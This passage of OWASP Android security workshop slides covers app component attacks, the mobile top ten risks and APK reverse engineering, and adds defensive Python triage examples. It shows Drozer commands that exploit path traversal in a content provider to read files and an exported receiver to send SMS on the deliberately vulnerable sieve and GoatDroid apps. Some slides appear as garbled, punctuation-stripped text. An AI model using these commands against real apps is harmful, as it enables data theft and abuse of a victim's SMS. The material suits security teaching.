One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "Battery Low", "boot completed", "headset plugged" etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy
Broadcast receivers
Broadcast receivers attacks
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
Broadcast receivers
Broadcast receivers attacks
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
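A manifest triage script that applies the rules from the Android Manifest slides and the defenses above: it flags every component another app can reach (explicit android:exported="true", or an intent-filter on a component that does not set exported="false"), reports whether a permission guards it, and lists custom permissions whose protectionLevel is normal or dangerous rather than signature. This is an added example, not part of the talk or of Drozer; the manifest it parses is a constructed sample modelled on the GoatDroid receiver and the sieve activities.

```python
"""Flag Android components reachable from other apps, per the manifest rules above.
Added example; SAMPLE_MANIFEST is constructed, not a real app's manifest."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample: one launcher activity, one explicitly exported activity,
# one filtered-but-private activity, an SMS receiver, a guarded provider.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sample">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="com.example.sample.INTERNAL"
              android:protectionLevel="normal" />
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true" />
    <activity android:name=".Settings" android:exported="false">
      <intent-filter>
        <action android:name="com.example.sample.OPEN_SETTINGS" />
      </intent-filter>
    </activity>
    <receiver android:name=".SendSMSNowReceiver">
      <intent-filter>
        <action android:name="com.example.sample.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.sample.db"
              android:exported="true"
              android:permission="com.example.sample.INTERNAL" />
    <service android:name=".SyncService" />
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def find_exposed_components(manifest_xml):
    """Return (kind, name, reason, guarding_permission) for each component
    other apps can reach: exported="true", or an <intent-filter> with no
    explicit exported="false" (the system then treats it as exported)."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = []
    for comp in app:
        if comp.tag not in COMPONENT_TAGS:
            continue
        exported = _attr(comp, "exported")
        has_filter = comp.find("intent-filter") is not None
        if exported == "true":
            reason = "exported=true"
        elif exported is None and has_filter:
            reason = "intent-filter without exported=false"
        else:
            continue  # exported=false, or no filter and no explicit export
        findings.append((comp.tag, _attr(comp, "name"), reason, _attr(comp, "permission")))
    return findings


def weak_custom_permissions(manifest_xml):
    """Custom permissions at level normal/dangerous (unset defaults to normal)
    can be requested by any app, so they do not restrict access the way
    'signature' does; a component guarded only by one is still reachable."""
    root = ET.fromstring(manifest_xml)
    weak = []
    for perm in root.findall("permission"):
        level = _attr(perm, "protectionLevel") or "normal"
        if level in ("normal", "dangerous"):
            weak.append((_attr(perm, "name"), level))
    return weak


def is_debuggable(manifest_xml):
    """android:debuggable="true" on <application> (the M4 mitigation says false)."""
    app = ET.fromstring(manifest_xml).find("application")
    return _attr(app, "debuggable") == "true"


if __name__ == "__main__":
    for kind, name, reason, perm in find_exposed_components(SAMPLE_MANIFEST):
        guard = "guarded by %s" % perm if perm else "no permission"
        print("%-8s %-22s %s (%s)" % (kind, name, reason, guard))
    print("weak custom permissions:", weak_custom_permissions(SAMPLE_MANIFEST))
    print("debuggable:", is_debuggable(SAMPLE_MANIFEST))
```

The MAIN/LAUNCHER activity is reported too, since it is reachable by design; the point of the listing is to review each reachable component, not to treat every hit as a bug.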
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – plain text configuration files
  – cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
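An offline triage of a pulled app data directory for the two checks above: files whose mode is world-readable (the MODE_WORLD_READABLE smell) and shared_prefs entries holding secrets in plain text. This is an added example, not from the talk; it builds a constructed /data/data-style tree in a temp folder instead of a real adb pull, and the list of secret-looking key names is an assumption.

```python
"""Triage an app data directory (as pulled with adb) for world-readable files
and plain-text secrets in SharedPreferences XML. Added example; the sample
tree is constructed here, not a real pull."""
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Assumed hints for keys that usually hold secrets
SECRET_KEY_HINTS = ("password", "passwd", "token", "secret", "pin", "session")


def world_readable_files(root):
    """Relative paths under root whose mode grants read to 'other' (o+r)."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IROTH:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def plaintext_secrets_in_prefs(root):
    """(file, key, value) for shared_prefs entries whose key hints at a secret.
    SharedPreferences has no built-in encryption, so any non-empty value is
    stored as plain text on the device."""
    hits = []
    prefs_dir = os.path.join(root, "shared_prefs")
    if not os.path.isdir(prefs_dir):
        return hits
    for name in sorted(os.listdir(prefs_dir)):
        if not name.endswith(".xml"):
            continue
        tree = ET.parse(os.path.join(prefs_dir, name))
        for elem in tree.getroot():          # <string name=..>v</string>, <boolean name=.. value=..>
            key = elem.get("name", "")
            value = elem.get("value") if elem.get("value") is not None else (elem.text or "")
            if value and any(h in key.lower() for h in SECRET_KEY_HINTS):
                hits.append((name, key, value))
    return hits


def build_sample_pull():
    """Construct a fake /data/data/<pkg> tree: a world-readable prefs file with
    a plain-text password and token, plus a correctly private database."""
    root = tempfile.mkdtemp(prefix="sample_pull_")
    os.makedirs(os.path.join(root, "shared_prefs"))
    os.makedirs(os.path.join(root, "databases"))
    prefs = os.path.join(root, "shared_prefs", "com.example.app_preferences.xml")
    with open(prefs, "w") as f:
        f.write('<?xml version="1.0" encoding="utf-8" standalone="yes" ?>\n'
                '<map>\n'
                '  <string name="username">alice</string>\n'
                '  <string name="password">hunter2</string>\n'
                '  <boolean name="remember_me" value="true" />\n'
                '  <string name="auth_token">eyJhbGciOi.sample.token</string>\n'
                '</map>\n')
    os.chmod(prefs, 0o644)          # world-readable, as MODE_WORLD_READABLE would leave it
    db = os.path.join(root, "databases", "app.db")
    with open(db, "wb") as f:
        f.write(b"SQLite format 3\x00")   # header only; contents are irrelevant here
    os.chmod(db, 0o600)             # private, as it should be
    return root


if __name__ == "__main__":
    root = build_sample_pull()
    print("world-readable:", world_readable_files(root))
    for fname, key, value in plaintext_secrets_in_prefs(root):
        print("plain-text secret in %s: %s = %s" % (fname, key, value))
```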
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or does it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – using known weak ciphers/versions (e.g. SSLv2/SSLv3, RC4)
  – securing only part of the communication (e.g. only authentication)
  – lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X509 certificate or public key
  if (presented_cert == pinned_cert) Start_connection() else Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
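A regex triage pass over decompiled Java (dex2jar plus JD-GUI/Luyten output) that serves both the M3 "how to find" slides above (the trust-all TrustManager and accept-all HostnameVerifier patterns that Mallodroid hunts for) and the M6 Broken Cryptography "how to find" slide (weak or deprecated algorithms, ECB mode, hard-coded keys). Added example, not Mallodroid's own code; the patterns are heuristics, and the source it scans is a constructed sample with one of each problem.

```python
"""Grep-style triage of decompiled Java for broken TLS validation (M3) and
weak/hard-coded cryptography (M6). Added example; regex heuristics, not a
parser, run over a constructed sample rather than a real app."""
import re

# Constructed decompiled-source sample; line numbers matter for the report
SAMPLE_SOURCE = '''
public class NetHelper {
    static final String KEY = "0123456789abcdef";      // hard-coded AES key
    static final byte[] IV = new byte[16];
    public static byte[] enc(byte[] d) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        MessageDigest md = MessageDigest.getInstance("MD5");
        return c.doFinal(d);
    }
    TrustManager[] tm = new TrustManager[] { new X509TrustManager() {
        public void checkServerTrusted(X509Certificate[] chain, String authType) {
        }
        public void checkClientTrusted(X509Certificate[] chain, String authType) {}
        public X509Certificate[] getAcceptedIssuers() { return null; }
    }};
    HostnameVerifier hv = new HostnameVerifier() {
        public boolean verify(String hostname, SSLSession s) { return true; }
    };
}
'''

# (finding, OWASP mobile risk it belongs to, compiled pattern)
CHECKS = [
    ("empty checkServerTrusted (trusts every certificate)", "M3",
     re.compile(r"checkServerTrusted\s*\([^)]*\)\s*(?:throws[^{]*)?\{\s*\}", re.S)),
    ("HostnameVerifier.verify always returns true", "M3",
     re.compile(r"boolean\s+verify\s*\([^)]*\)\s*\{\s*return\s+true\s*;\s*\}", re.S)),
    ("ALLOW_ALL_HOSTNAME_VERIFIER in use", "M3",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER")),
    ("weak or deprecated algorithm (RC4/MD4/MD5/SHA-1/DES)", "M6",
     re.compile(r'getInstance\s*\(\s*"(?:ARCFOUR|RC4|MD4|MD5|SHA-?1|DES)(?:/[^"]*)?"')),
    ("AES in ECB mode", "M6",
     re.compile(r'getInstance\s*\(\s*"AES/ECB')),
    ("hard-coded key or IV constant", "M6",
     re.compile(r'\b(?:KEY|IV|SECRET|PASSWORD)\w*\s*=\s*(?:"[^"]+"|new\s+byte\[)', re.I)),
]


def scan_source(text):
    """Return sorted (line_number, risk, finding) tuples for every match;
    a human still has to confirm each one in the decompiled code."""
    hits = set()
    for finding, risk, pattern in CHECKS:
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            hits.add((line_no, risk, finding))
    return sorted(hits)


if __name__ == "__main__":
    for line_no, risk, finding in scan_source(SAMPLE_SOURCE):
        print("line %2d  %s  %s" % (line_no, risk, finding))
```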
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
  – a session expires (copy a cookie and try to use it after 30 minutes)
  – a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – you are able to guess any other session (e.g. it is easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
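The three checks above (expiry, destruction on an authentication change, unguessable tokens) map directly onto a server-side session store. The following is an added example, not code from the workshop: a minimal in-memory store in Python that issues tokens from the OS CSPRNG, expires them after a TTL (the 30-minute value is an assumption chosen to match the test on the slide), and destroys a user's sessions when the authenticated identity changes. The class and method names are the example's own.

```python
import hmac
import secrets

SESSION_TTL_SECONDS = 30 * 60   # assumption: 30-minute idle window, as in the slide's test


class SessionStore:
    """Server-side session store (constructed example, not a real framework)."""

    def __init__(self, ttl=SESSION_TTL_SECONDS):
        self.ttl = ttl
        self._sessions = {}   # token -> (user, expires_at)

    def create(self, user, now):
        # 32 random bytes from the OS CSPRNG; never derive the token from the
        # device ID, the username or the clock, all of which can be guessed.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user, now + self.ttl)
        return token

    def lookup(self, token, now):
        """Return the user for a valid token, or None if unknown or expired."""
        match = None
        for stored in self._sessions:
            # constant-time compare so timing does not reveal how much of a guess was right
            if hmac.compare_digest(stored.encode(), token.encode()):
                match = stored
        if match is None:
            return None
        user, expires_at = self._sessions[match]
        if now >= expires_at:
            del self._sessions[match]   # expired tokens are destroyed, not merely rejected
            return None
        return user

    def invalidate_user(self, user):
        """Destroy every session of a user (logout, password change); returns the count."""
        doomed = [t for t, (u, _) in self._sessions.items() if u == user]
        for t in doomed:
            del self._sessions[t]
        return len(doomed)

    def switch_user(self, old_token, new_user, now):
        """Authentication state change: the old session dies and a fresh token is issued."""
        old_user = self.lookup(old_token, now)
        if old_user is not None:
            self.invalidate_user(old_user)
        return self.create(new_user, now)


if __name__ == "__main__":
    store = SessionStore()
    tok = store.create("alice", 1000.0)
    print("valid now:", store.lookup(tok, 1060.0))
    print("after ttl:", store.lookup(tok, 1000.0 + SESSION_TTL_SECONDS + 1))
```

The store keeps the timestamp as a parameter rather than calling the clock so the expiry path can be exercised deterministically; a real deployment would pass `time.time()`.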
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
[diagram: decompiling pipeline DEX → JAR → JAVA]
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows to use any existing Java decompiler with the resulting JAR file
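Both dex2jar and apktool start from the DEX container, and anyone who modifies Smali and rebuilds (as in the demo later) has to regenerate the DEX header's checksum and signature or the runtime rejects the file. As an added example, not code from the workshop or from either tool, the following Python parses the fixed 0x70-byte DEX header and verifies those two fields: the Adler-32 checksum covers everything after the checksum field, and the SHA-1 signature covers everything after the signature field. The sample input is a constructed header-only file built by the block itself, not a real application.

```python
import hashlib
import struct
import zlib

DEX_MAGIC = b"dex\n035\0"   # "dex\n" + version "035" + NUL
HEADER_SIZE = 0x70


def build_minimal_dex():
    """Constructed header-only DEX with valid checksum and signature (test input only)."""
    body = bytearray(HEADER_SIZE)
    body[0:8] = DEX_MAGIC
    struct.pack_into("<I", body, 32, HEADER_SIZE)    # file_size
    struct.pack_into("<I", body, 36, HEADER_SIZE)    # header_size
    struct.pack_into("<I", body, 40, 0x12345678)     # endian_tag (little-endian constant)
    # signature: SHA-1 over everything after the signature field (offset 32 to end)
    body[12:32] = hashlib.sha1(bytes(body[32:])).digest()
    # checksum: Adler-32 over everything after the checksum field (offset 12 to end)
    struct.pack_into("<I", body, 8, zlib.adler32(bytes(body[12:])) & 0xFFFFFFFF)
    return bytes(body)


def parse_dex_header(data):
    """Return the header fields plus integrity verdicts for a DEX byte string."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a DEX header")
    magic = data[0:8]
    (checksum,) = struct.unpack_from("<I", data, 8)
    signature = data[12:32]
    file_size, header_size, endian_tag = struct.unpack_from("<III", data, 32)
    return {
        "magic_ok": magic[:4] == b"dex\n" and magic[7:8] == b"\0",
        "version": magic[4:7].decode("ascii", "replace"),
        "checksum_ok": checksum == (zlib.adler32(data[12:]) & 0xFFFFFFFF),
        "signature_ok": signature == hashlib.sha1(data[32:]).digest(),
        "file_size_ok": file_size == len(data),
        "header_size": header_size,
        "little_endian": endian_tag == 0x12345678,
    }


def tamper(data, offset, mask=0x01):
    """Flip bits of one byte, as a patched-but-not-resigned DEX would look."""
    b = bytearray(data)
    b[offset] ^= mask
    return bytes(b)


if __name__ == "__main__":
    dex = build_minimal_dex()
    print(parse_dex_header(dex))
    print(parse_dex_header(tamper(dex, 0x60)))
```

On a real file read with `open(path, "rb").read()` the same function reports whether a repacked DEX was re-hashed; a mismatch in either field is what the Dalvik/ART loader checks before accepting the file.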
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
[screenshots: JD-GUI, Luyten]
Disassembling
[diagram: DEX → SMALI]
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik byte code (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Android Runtime
• Core libraries
• Dalvik Virtual Machine
• DVM vs JVM differences
• ART
Dalvik VM
• The software that runs the apps on Android devices
• It's fast even on weak CPUs
• It will run on systems with little memory
• It will run in an energy-efficient way
• Provides application portability and runtime consistency
• Runs an optimized file format (dex) and Dalvik bytecode
• Java class/jar files are converted to dex at build time
ART vs DVM
• Android 4.4 – experimental; from Android 5.0 – default
• Ahead-of-time (AOT) compilation
• Improved garbage collection
• Improved diagnostic detail in exceptions and crash reports
Application Framework
• Activity Manager – manages the activity life cycle of applications
• Content Providers – manage the data sharing between applications
• Telephony Manager – manages all voice calls
• Location Manager – location management using GPS or cell towers
• Resource Manager – manages the various types of resources we use in our application
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK: how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install time security decisions
• Android 6.0 security release
Android 6.0
• Runtime Permissions
• Verified Boot
• Hardware-Isolated Security
• Fingerprints
• SD Card Adoption
• Clear Text Traffic
• System Hardening
• USB Access Control
Defense layers (Google Play)
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
• By default only Google Play and other pre-installed app stores are allowed to install apps
• The vast majority of installs come from Google Play
Verify Apps
• Apps are verified prior to install
• Warn for or block Potentially Harmful Applications
• Over 10 million installs verified every day
• Verifying is on and visible when needed
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Links
• http://developer.android.com/about/dashboards/index.html
• https://docs.google.com/presentation/d/1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPw/pub?start=false&loop=false&delayms=3000&slide=id.g1202bd8e5_0193
• http://www.cubrid.org/blog/dev-platform/android-at-a-glance
• http://news.softpedia.com/news/Google-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367.shtml
• http://developer.android.com/tools/building/index.html
• http://android-anything.diandian.com/post/2011-09-28/5377936
• http://www.vogella.com/tutorials/Android/article.html#androiddevelopment_art
• https://source.android.com/devices/tech/dalvik/index.html
• https://en.wikipedia.org/wiki/Android_Runtime
• https://source.android.com/devices/tech/dalvik/gc-debug.html
• https://source.android.com/security/overview/app-security.html
• http://www.javatpoint.com/internal-details-of-hello-android-example
• https://decompileandsecureapk.wordpress.com/2014/05/10/decompile-and-secure-android-apk
• http://developer.android.com/tools/debugging/debugging-memory.html#LogMessages
• https://source.android.com/devices
• http://developer.android.com/training/articles/security-tips.html
• https://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://www.compiletimeerror.com/2012/12/blog-post.html#.VsReZ_krKM-
